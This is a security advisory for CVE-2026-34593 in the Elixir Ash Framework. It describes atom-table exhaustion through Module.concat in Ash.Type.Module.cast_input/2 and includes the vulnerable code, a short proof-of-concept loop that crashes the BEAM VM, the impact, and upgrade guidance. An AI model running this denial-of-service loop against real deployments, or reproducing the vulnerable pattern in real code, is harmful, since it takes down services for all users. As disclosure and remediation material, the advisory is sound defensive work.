CVE-2026-34593: Ash Framework: Ash.Type.Module.cast_input/2 atom exhaustion via unchecked Module.concat allows BEAM VM crash
Summary
Ash.Type.Module.castinput/2 unconditionally creates a new Erlang atom via Module.concat([value]) for any user-supplied binary string that starts with "Elixir.", before verifying whether the referenced module exists. Because Erlang atoms are never garbage-collected and the BEAM atom table has a hard default limit of approximately 1,048,576 entries, an attacker who can submit values to any resource attribute or argument of type :module can exhaust this table and crash the entire BEAM VM, taking down the application.
Details
Setup: A resource with a :module-typed attribute exposed to user input, which is a supported and documented usage of the Ash.Type.Module built-in type:
elixir defmodule MyApp.Widget do use Ash.Resource, domain: MyApp, datalayer: AshPostgres.DataLayer
attributes do uuidprimarykey :id attribute :handlermodule, :module, public?: true end
actions do defaults [:read, :destroy] create :create do accept [:handlermodule] end end end
Vulnerable code in lib/ash/type/module.ex, lines 105-113:
elixir def castinput("Elixir." <> = value, ) do module = Module.concat([value]) # <-- Creates new atom unconditionally if Code.ensureloaded?(module) do {:ok, module} else :error # <-- Returns error but atom is already created end end
Exploit: Submit repeated Ash.create requests (e.g., via a JSON API endpoint) with unique "Elixir." strings:
elixir Attacker-controlled loop (or HTTP requests to an API endpoint) for i <- 1..1100000 do Ash.Changeset.forcreate(MyApp.Widget, :create, %{handlermodule: "Elixir.Attack#{i}"}) |> Ash.create() # Each iteration: Module.concat(["Elixir.Attack#{i}"]) creates a new atom # castinput returns :error but the atom :"Elixir.Attack#{i}" persists end After ~1,048,576 unique strings: BEAM crashes with systemlimit
Contrast: The non-"Elixir." path in the same function correctly uses String.toexistingatom/1, which is safe because it only looks up atoms that already exist:
elixir def castinput(value, ) when isbinary(value) do atom = String.toexistingatom(value) # safe - raises if atom doesn't exist ... end
Additional occurrence: caststored/2 at line 141 contains the identical pattern, which is reachable when reading :module-typed values from the database if an attacker can write arbitrary "Elixir." strings to the relevant database column.
Impact
An attacker who can submit requests to any API endpoint backed by an Ash resource with a :module-typed attribute or argument can crash the entire BEAM VM process. This is a complete denial of service: all resources served by that VM instance (not just the targeted resource) become unavailable. The crash cannot be prevented once the atom table is full, and recovery requires a full process restart.
Fix direction: Replace Module.concat([value]) with String.toexistingatom(value) wrapped in a rescue ArgumentError block (as already done in the non-"Elixir." branch), or validate that the atom already exists before calling Module.concat by first attempting String.toexistingatom and only falling back to Module.concat on success.
Other sources
Ash Framework is a declarative, extensible framework for building Elixir applications. Prior to version 3.22.0, Ash.Type.Module.castinput/2 unconditionally creates a new Erlang atom via Module.concat([value]) for any user-supplied binary string that starts with "Elixir.", before verifying whether the referenced module exists. Because Erlang atoms are never garbage-collected and the BEAM atom table has a hard default limit of approximately 1,048,576 entries, an attacker who can submit values to any resource attribute or argument of type :module can exhaust this table and crash the entire BEAM VM, taking down the application. This issue has been patched in version 3.22.0.
— MITRE
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
erlang/ashto a version that resolves this vulnerability.Fixed in 3.22.0 - Upgrade
Upgrade
Ash.Type.Module (Ash Framework)to a version that resolves this vulnerability.Fixed in 3.22.0Patch 3.22.0
Event History
Frequently Asked Questions
What is the severity of CVE-2026-34593?
CVE-2026-34593 is considered a high severity vulnerability due to its potential for arbitrary atom creation in Erlang.
How do I fix CVE-2026-34593?
To fix CVE-2026-34593, you should upgrade to Ash version 3.22.0 or later.
What causes CVE-2026-34593?
CVE-2026-34593 is caused by unconditionally creating a new Erlang atom from user-supplied input without verifying the module's existence.
Which versions are affected by CVE-2026-34593?
CVE-2026-34593 affects Ash versions up to and including 3.21.3.
Is CVE-2026-34593 an issue with user input handling?
Yes, CVE-2026-34593 is related to improper handling of user input when creating Erlang atoms.